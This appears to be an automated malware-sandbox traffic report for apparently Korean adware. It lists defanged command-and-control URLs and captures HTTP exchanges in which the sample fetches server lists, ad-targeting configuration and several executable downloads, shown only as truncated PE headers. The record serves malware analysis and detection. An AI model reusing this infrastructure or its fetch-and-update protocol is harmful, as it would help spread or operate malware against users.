hxxp://hostserver.kr/Config/AdNw/StakePsList.asp?uno=5 220.73.162.54
hxxp://220.73.162.29/Config/FormLocation.asp
hxxp://220.73.162.29/Config/AdNw/FcPimSLab.asp
hxxp://220.73.162.29/Config/newConf/UCg_LPrMLab.asp?user_no=3
hxxp://220.73.162.29/Config/TransSiteString.asp?nation=KOREA
hxxp://220.73.162.4/Download/WinCtrCon.exe
hxxp://makevalue.com/Config/sTakeList.asp?n=3 220.73.162.46
hxxp://220.73.162.23/Config/AdNw/FcTimeLab.asp
hxxp://220.73.162.23/Config/NewConf/ProgramUpdateLab.asp?version=1681
hxxp://220.73.162.3/Download/WinCtrProc.exe
hxxp://maketop.kr/Config/AdNw/StakePsList.asp?uno=3 220.73.162.49
hxxp://220.73.162.37/Config/FormLocation.asp
hxxp://220.73.162.37/Config/AdNw/FcPimSLab.asp
hxxp://220.73.162.37/Config/newConf/UCg_LPrMLab.asp?user_no=3
hxxp://220.73.162.37/Config/TransSiteString.asp?nation=KOREA
hxxp://220.73.162.37/config/keyword_platinum.asp?user_no=3&SubName=MAIN
hxxp://220.73.162.37/Config/ipget.asp?kn=first&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681
hxxp://220.73.162.37/Config/ipget.asp?kn=every&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681
hxxp://loadform.co.kr/Download/Uninstall_Ctr.exe 220.73.162.14


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /Config/sTakeList.asp?n=3 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: makevalue.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCTCDQBC=ABCEJILDHGLDIHLIFCFGACJL; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:24 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..



GET /Download/WinCtrProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.3
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 28 Nov 2014 05:31:37 GMT
Accept-Ranges: bytes
ETag: "3ae67894ccad01:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:15:22 GMT
Content-Length: 851416
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:.
.,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L...T.sT......
...............P.......r............@.................................
{...........................................(.........................
..................................................0... ...............
.....................text............................... ..`.data....5
[email protected]...............................@..@
l.[J............MSVBVM60.DLL..........................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /Config/FormChecktimemicroLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.27
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 159
Content-Type: text/html
Server: Microsoft-IIS/8.0
Set-Cookie: ASPSESSIONIDSSBBASCC=DDDMIILDMMNGPHCEICAHNOMB; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:47 GMT
5|5|60|hXXp://micronames.co.kr/Download,hXXp://220.73.162.2/Download,h
ttp://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||10
0|120|Y|Y|Y|Y|Y|Y......


GET /Config/ProgramUpdateLab.asp?version=1208 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.27
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSBBASCC=DDDMIILDMMNGPHCEICAHNOMB


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21
Content-Type: text/html
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:27:47 GMT
1656|MicroProProc.exe..



GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.co
m/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.na
ver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.
com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962
|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#
..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.
naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|
C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/pe
tition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|
58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|90
0|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430
#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http
://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..h
ttp://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9
|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|90
0|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34
|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|5
8.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C
|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafeh
ome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_t
op_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media
.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<< skipped >>>

GET /Config/AdNw/FcPimSLab.asp HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y......


GET /Config/newConf/UCg_LPrMLab.asp?user_no=3 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 314
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:24:06 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:05 GMT
KOREA|Y|N|N|N|hXXp://|Y|N|N|0|hXXp://220.73.162.55/config/LanguageTran
slate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://k
r.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=
[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|
Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....


GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.29
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQTCCTTT=FPPJIHLDAKANDCIKBIBFIJFE


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12071
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:06 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?
p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u]
,ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com
/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1
],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.
yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWO
RD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http
://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.y
ahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.
com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http:
//fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://tran
slate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JA
PAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http
://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF
-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.n
aver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[
1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.se
arch.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][
KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,h
ttp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<< skipped >>>


GET /Config/FormLocation.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5287
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
hXXp://blink.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://cafe.naver.co
m/CafeRankingSectionList.nhn?|961|C|962|50|R|L|8|8|283#..hXXp://kin.na
ver.com/db/detail.php?|961|C|962|50|R|L|10|10|283#..hXXp://news.naver.
com|961|C|962|50|R|L|8|8|283#..hXXp://section.blog.naver.com|961|C|962
|50|R|L|8|8|283#..hXXp://sample.naver.com|781|C|870|260|R|L|12|12|255#
..hXXp://weather.news.naver.com|961|C|962|50|R|L|8|8|283#..hXXp://VVV.
naver.com|882|C|882|260|R|L|6|6|255#..hXXp://agora.media.daum.net|978|
C|58.34|900|R|L|9|9|430#..hXXp://agoraplaza.media.daum.net/petition/pe
tition.do?|978|C|58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/?|978|C|
58.34|900|R|L|9|9|430#..hXXp://blog.daum.net/_blog/_top|978|C|58.34|90
0|R|L|9|9|430#..hXXp://blog.daum.net/_top/|978|C|58.34|900|R|L|9|9|430
#..hXXp://blog.daum.net/_top/layout|978|C|58.34|900|R|L|9|9|430#..http
://cafe.daum.net/_c21_/cafefocus_list?|978|C|58.34|900|R|L|9|9|430#..h
ttp://cafe.daum.net/_ranking/rank_top100_1.html?|978|C|58.34|900|R|L|9
|9|430#..hXXp://cafe.daum.net/support/cafesupport.html?|978|C|58.34|90
0|R|L|9|9|430#..hXXp://cafe.daum.net/brand/brandstar.html?|978|C|58.34
|900|R|L|9|9|430#..hXXp://cafe.daum.net/event/event_list.html?|978|C|5
8.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/_bbs/0noti/bbs_read?|978|C
|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/?_top_blogtop=navi_cafeh
ome|978|C|58.34|900|R|L|9|9|430#..hXXp://cafe.daum.net/top/top.html?_t
op_cafetop=cafehome|978|C|58.34|900|R|L|9|9|430#..hXXp://cartoon.media
.daum.net|978|C|58.34|900|R|L|9|9|430#..hXXp://issue.media.daum.ne
<<< skipped >>>

GET /Config/AdNw/FcPimSLab.asp HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
5|5|60|hXXp://loadform.co.kr/Download,hXXp://220.73.162.2/Download,htt
p://220.73.162.3/Download,hXXp://220.73.162.4/Download|5|100|100||100|
120|Y|Y|Y|Y|Y|Y......


GET /Config/newConf/UCg_LPrMLab.asp?user_no=3 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 314
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:31 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:30 GMT
KOREA|Y|N|N|N|hXXp://|Y|N|N|0|hXXp://220.73.162.55/config/LanguageTran
slate.asp?hl=[u]&sl=[u]&tl=[1]&p=[KEYWORD]|name="p" value=,16|hXXp://k
r.dictionary.search.yahoo.com/search/dictionaryp?subtype=[1]&prop=7&p=
[KEYWORD]|50|N|N|N|0|hXXp://VVV.hebogo.com/search/csearch.asp|N|0|N|0|
Y|N|N|N|N|Y|Y|Y|0|N|ALRIM|Y|N|N|N|....


GET /Config/TransSiteString.asp?nation=KOREA HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24143
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
KOREA,ko,hXXp://kr.search.yahoo.com,hXXp://kr.search.yahoo.com/search?
p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u]
,ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,hXXp://search.yahoo.com
/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[1
],tl=[u],ie=UTF-8,,|CHINA,zh-TW,hXXp://one.cn.yahoo.com,hXXp://one.cn.
yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][KEYWO
RD],sl=[1],tl=[u],ie=UTF-8,,|CANADA,ca,hXXp://ca.search.yahoo.com,http
://ca.search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.y
ahoo.com,hXXp://de.search.yahoo.com/search?p=,hXXp://translate.google.
com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|FRANCE,fr,http:
//fr.search.yahoo.com,hXXp://fr.search.yahoo.com/search?p=,hXXp://tran
slate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JA
PAN,ja,hXXp://VVV.yahoo.co.jp,hXXp://search.yahoo.co.jp/search?p=,http
://translate.google.com/translate?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF
-8,,|KOREA,ko,hXXp://search.naver.com,hXXp://search.naver.com/search.n
aver?query=,hXXp://translate.google.com/translate?,u=[3][KEYWORD],sl=[
1],tl=[u],ie=UTF-8,,|GERMAN,de,hXXp://de.search.yahoo.com,hXXp://de.se
arch.yahoo.com/search?p=,hXXp://translate.google.com/translate?,u=[3][
KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|ENGLISH,en,hXXp://search.yahoo.com,h
ttp://search.yahoo.com/search?p=,hXXp://translate.google.com/translate
?,u=[3][KEYWORD],sl=[1],tl=[u],ie=UTF-8,,|JAPAN,ja,hXXp://VVV.goog
<<< skipped >>>

GET /config/keyword_platinum.asp?user_no=3&SubName=MAIN HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4784
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:31 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
[icon][/icon][startpage][/startpage][startpop][/startpop][popup][/popu
p][adminkeywordpop]N|1024*750|1|..........^±¤°í´ëÇà»
ç^광고대행사                     
###N|1024*750|2|..........^Å°¿öµå±¤°í^키ì
›Œë“œê´‘ê³                      ###N|1024*750|3|
http:VVV.naver.com^http:naver.com                     ###N|1024*750|4|
http:VVV.daum.net                     ###N|1024*750|5|http:kr.yahoo.co
m                     ###N|1024*750|6|http:VVV.paran.com              
       ###N|1024*750|7|http:VVV.netmarble.net                     ###N
|1024*750|8|http:VVV.gajai.com                     ###N|1024*750|9|htt
p:VVV.korea.com^http:VVV.freechal.com^http:VVV.dreamwiz.com           
          ###N|1024*750|10|http:VVV.chol.com^http:kr.msn.com^http:VVV.
hanafos.com                     ###N|1024*750|11|http:VVV.imbc.com^htt
p:VVV.chosun.com^http:VVV.sportsseoul.com^http:VVV.edaily.co.kr       
              ###N|1024*750|12|http:VVV.soribada.com                  
   ###N|1024*750|13|http:VVV.hangame.com^http:VVV.sayclub.com         
            ###N|1024*750|14|http:VVV.gmarket.co.kr^http:VVV.interpark
.com                     ###N|1024*750|15|http:VVV.buddybuddy.co.kr   
                  ###N|1024*750|16|http:sample.naver.com^.............
...                     ###N|1024*750|17|http:zusoo.com^http:VVV.nugun
i.com^http:VVV.emdb.co.kr^http:VVV.unitel.co.kr^http:VVV.totalplaza.co
m                     ###N|1024*750|18|http:VVV.tworld.co.kr^http:
<<< skipped >>>

GET /Config/ipget.asp?kn=first&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:32 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:31 GMT
....


GET /Config/ipget.asp?kn=every&usd=3&SubName=MAIN&preid=0&ver=sup&Version=1681 HTTP/1.1


Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.37
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQBTBCQT=LNPLCILDCCBOGKBOIAOJHJBP


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Wed, 03 Dec 2014 20:23:32 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:32 GMT



GET /Download/MicroProProc.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 01 Sep 2014 06:19:11 GMT
Accept-Ranges: bytes
ETag: "31bdfa5acc5cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:14:52 GMT
Content-Length: 839160
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........MTK.,:..,:.
.,:.~04..,:..33..,:..37..,:.Rich.,:.................PE..L....M.T......
...............P......8r............@.................................
7...........................................(.........................
..................................................0... ...............
.....................text............................... ..`.data....5
[email protected]...............................@..@
=..H............MSVBVM60.DLL..........................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /Config/ServerList.asp?n=3030 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: mainserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDQRRRD=MHPAFILDLKPBKIJGADDOBBKJ; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:24:49 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..



GET /Download/WinCtrCon.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.4
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 28 Nov 2014 05:30:13 GMT
Accept-Ranges: bytes
ETag: "3175062ccad01:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:15:02 GMT
Content-Length: 114144
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......}...9...9...
9.......8...P...?.......8...Rich9...........PE..L...H.sT..............
...p... .......!............@.........................................
.................................h..(.................................
..........................................(... .......................
.............text....a.......p.................. ..`.data.............
[email protected]...............................@..@l.[J....
........MSVBVM60.DLL..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /Download/Uninstall_Ctr.exe HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
User-Agent: Microsoft URL Control - 6.01.9782
Host: loadform.co.kr
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 28 Jul 2014 00:14:35 GMT
Accept-Ranges: bytes
ETag: "746f7e9f8a9cf1:0"
Server: Microsoft-IIS/8.0
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:26:24 GMT
Content-Length: 191984
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........y.........
....................`.......Rich............................PE..L...8.
yS..................... .......(............@.........................
.........(..........................................(.......@.........
..........................................................8... .......
.............................text............................... ..`.d
[email protected]...@.......................
....@..@=..H............MSVBVM60.DLL..................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /Config/ServerList.asp?uno=3030 HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: hostserver.kr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 917
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSTTAAQQ=DFCDJILDBKBEAIJCNMALDIJO; path=/
X-Powered-By: ASP.NET
Date: Wed, 03 Dec 2014 20:23:34 GMT
hXXp://220.73.162.22,..hXXp://220.73.162.23,..hXXp://220.73.162.24,..h
ttp://220.73.162.25,..hXXp://220.73.162.26,..hXXp://220.73.162.27,..ht
tp://220.73.162.28,..hXXp://220.73.162.29,..hXXp://220.73.162.30,..htt
p://220.73.162.31,..hXXp://220.73.162.32,..hXXp://220.73.162.33,..http
://220.73.162.34,..hXXp://220.73.162.35,..hXXp://220.73.162.36,..http:
//220.73.162.37,..hXXp://220.73.162.38,..hXXp://220.73.162.39,..http:/
/220.73.162.40,..hXXp://220.73.162.41,..hXXp://220.73.162.42,..hXXp://
220.73.162.43,..hXXp://220.73.162.44,..hXXp://220.73.162.45,..hXXp://2
20.73.162.46,..hXXp://220.73.162.47,..hXXp://220.73.162.48,..hXXp://22
0.73.162.49,..hXXp://220.73.162.50,..hXXp://220.73.162.51,..hXXp://220
.73.162.52,..hXXp://220.73.162.53,..hXXp://220.73.162.54,..hXXp://220.
73.162.55,..hXXp://220.73.162.56,..hXXp://220.73.162.57,..hXXp://220.7
3.162.58,..hXXp://220.73.162.59,..hXXp://220.73.162.60,..hXXp://220.73
.162.61..



GET /Config/AdNw/FcTimeLab.asp HTTP/1.1
Accept: image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*
User-Agent: Microsoft URL Control - 6.01.9782
Host: 220.73.162.23
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 157
Content-Type: text/html
Server: Microsoft-IIS/8.0
